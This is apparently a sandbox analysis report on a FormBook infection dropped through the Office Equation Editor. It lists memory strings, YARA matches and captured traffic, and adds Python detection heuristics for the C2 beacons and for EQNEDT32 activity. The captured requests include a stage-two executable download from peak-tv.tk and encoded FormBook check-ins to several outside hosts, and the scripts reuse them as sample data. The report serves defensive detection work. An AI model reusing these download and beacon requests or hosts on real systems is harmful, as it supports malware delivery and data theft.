Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.fatcow.com/free-icons/
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.gnome.org/
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp01l
Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
Source: explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.small-icons.com/packs/16x16-free-application-icons.htm
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: medicomsh78694.exe String found in binary or memory: https://github.com/proviq/lusrmgr
Source: medicomsh78694.exe String found in binary or memory: https://github.com/proviq/lusrmgr/
Source: medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: https://visualpharm.com/must_have_icon_set/
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
Source: unknown DNS traffic detected: queries for: peak-tv.tk
Source: global traffic HTTP traffic detected: GET /medicomzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: peak-tv.tk | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.prestigiousuniforms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.muzicalbox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.extraordinarymiracle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.realstakepool.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
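The four check-ins above share one shape: a short directory (/md4m/), a two-parameter query whose first value is a base64-looking blob and whose second value (WZ8=Jpspdz90i) is constant across four unrelated hosts, all sent with Connection: close. The script below is an added example, not part of the sandbox report, that turns that shape into a proxy-log heuristic and then clusters hits by the constant token, because FormBook walks a domain list with the same beacon and a cluster spanning several hosts is a far stronger signal than any one request. The sample set is constructed: the five malicious requests are copied from the findings above, the www.example.com request is invented for contrast, and the regex bounds are assumptions to tune against your own sightings.

```python
import re
from collections import defaultdict

# Constructed sample set: stage-two download plus the four FormBook check-ins
# copied from the report's network findings; the last entry is a benign request
# invented for contrast. Tuples are (host, method, request-target, headers).
SAMPLE_REQUESTS = [
    ("peak-tv.tk", "GET", "/medicomzx.exe", {"Connection": "Keep-Alive"}),
    ("www.prestigiousuniforms.com", "GET",
     "/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i",
     {"Connection": "close"}),
    ("www.muzicalbox.com", "GET",
     "/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i",
     {"Connection": "close"}),
    ("www.extraordinarymiracle.com", "GET",
     "/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i",
     {"Connection": "close"}),
    ("www.realstakepool.com", "GET",
     "/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i",
     {"Connection": "close"}),
    ("www.example.com", "GET", "/api/?page=2&sort=asc", {"Connection": "close"}),
]

# Shape of the check-in seen in this report: short directory, exactly two short
# query keys, a base64-looking blob in the first, a short token in the second.
# The length bounds are assumptions, not a vendor signature.
_DIR_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
_TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,16}$")


def split_target(target):
    """Split a request-target into path and (key, value) pairs WITHOUT decoding,
    so the '+' inside the base64 blob survives (urllib would turn it into a space)."""
    path, _, query = target.partition("?")
    params = []
    for part in (query.split("&") if query else []):
        key, _, value = part.partition("=")
        params.append((key, value))
    return path, params


def is_formbook_beacon(method, target, headers):
    """Heuristic match for a single request."""
    if method != "GET":
        return False
    path, params = split_target(target)
    if not _DIR_RE.match(path) or len(params) != 2:
        return False
    (key1, blob), (key2, token) = params
    if not (1 <= len(key1) <= 4 and 1 <= len(key2) <= 4):
        return False
    if not (_B64_RE.match(blob) and _TOKEN_RE.match(token)):
        return False
    connection = {k.lower(): v for k, v in headers.items()}.get("connection", "")
    return connection.lower() == "close"


def beacon_clusters(requests):
    """Group matching beacons by (path, token key, token value) and list the hosts
    each cluster touched; one cluster across several hosts is the real finding."""
    clusters = defaultdict(list)
    for host, method, target, headers in requests:
        if is_formbook_beacon(method, target, headers):
            path, params = split_target(target)
            clusters[(path, params[1][0], params[1][1])].append(host)
    return dict(clusters)


if __name__ == "__main__":
    for key, hosts in beacon_clusters(SAMPLE_REQUESTS).items():
        print(key, "->", hosts)
```

Run against the constructed set, the stage-two download and the benign request fall through, and the four check-ins collapse into a single cluster keyed on ("/md4m/", "WZ8", "Jpspdz90i"). In production, the cluster key is also the pivot to use for hunting: the directory and token rotate per build, so alert on the cluster rather than on a hard-coded path.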

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
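The Equation Editor has no legitimate reason to write executables, open sockets or spawn children, which is why the three Sigma hits in this report (file dropped, internet connection, process start) are high-confidence. The script below is an added example, not part of the report, that encodes those three checks over Sysmon-style events. One caveat worth building in: Word starts EQNEDT32.EXE out of process through DCOM, so its parent is a svchost.exe (DCOMLaunch), not WINWORD.EXE; a rule keyed on a WINWORD-to-EQNEDT32 parent-child pair will miss it, so the logic keys on the acting image instead. The events are constructed to mirror the two dropped-file paths above; the network-connect and process-create events are assumptions derived from the report's signatures (port 80 and the child image are not stated on the page), and the MZ header bytes are invented.

```python
from dataclasses import dataclass

EQNEDT_IMAGE = "eqnedt32.exe"
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl")
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")


@dataclass
class Event:
    """Minimal stand-in for a Sysmon record (EID 11 FileCreate, EID 3 NetworkConnect,
    EID 1 ProcessCreate). `head` is the first bytes of a created file when the
    sensor can supply them; it catches PE files dropped without a PE extension."""
    kind: str            # "file_create" | "net_connect" | "process_create"
    image: str           # process performing the action
    target: str          # created path, destination host:port, or child image
    head: bytes = b""


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed events: the two file drops mirror the report; the connect and
# child-process records are assumed from its signatures; head bytes are invented.
SAMPLE_EVENTS = [
    Event("file_create", EQNEDT,
          r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
          r"\Content.IE5\ZAE7RW1P\medicomzx[1].exe", b"MZ\x90\x00"),
    Event("file_create", EQNEDT, r"C:\Users\user\AppData\Roaming\medicomsh78694.exe",
          b"MZ\x90\x00"),
    Event("net_connect", EQNEDT, "peak-tv.tk:80"),
    Event("process_create", EQNEDT, r"C:\Users\user\AppData\Roaming\medicomsh78694.exe"),
    # Benign: Word writing its own scratch file, as the report also records.
    Event("file_create", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
          r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
          r"\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp"),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a rule name when an Equation Editor event matches, else None."""
    if _basename(event.image) != EQNEDT_IMAGE:
        return None
    target = event.target.lower()
    if event.kind == "file_create":
        looks_pe = event.head.startswith(b"MZ") or target.endswith(PE_EXTENSIONS)
        if looks_pe and any(d in target for d in USER_WRITABLE):
            return "eqnedt32_drops_pe"
        return None
    if event.kind == "net_connect":
        return "eqnedt32_network_connect"
    if event.kind == "process_create":
        return "eqnedt32_spawns_process"
    return None


def triage(events):
    """List (rule, target) for every event that trips one of the checks."""
    hits = []
    for event in events:
        rule = classify(event)
        if rule:
            hits.append((rule, event.target))
    return hits


if __name__ == "__main__":
    for rule, target in triage(SAMPLE_EVENTS):
        print(f"{rule}: {target}")
```

On the constructed set this yields four hits and leaves the WINWORD scratch-file write alone. The network and process checks deliberately have no allow-list: Equation Editor has been removed from supported Office builds since the January 2018 updates, so on a patched estate any EQNEDT32.EXE activity at all is worth a look.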
.NET source code contains very large strings
Source: medicomzx[1].exe.2.dr, MainForm.cs Long String: Length: 22528
Source: medicomsh78694.exe.2.dr, MainForm.cs Long String: Length: 22528
Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs Long String: Length: 22528
Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs Long String: Length: 22528
Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs Long String: Length: 22528
Yara signature match
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
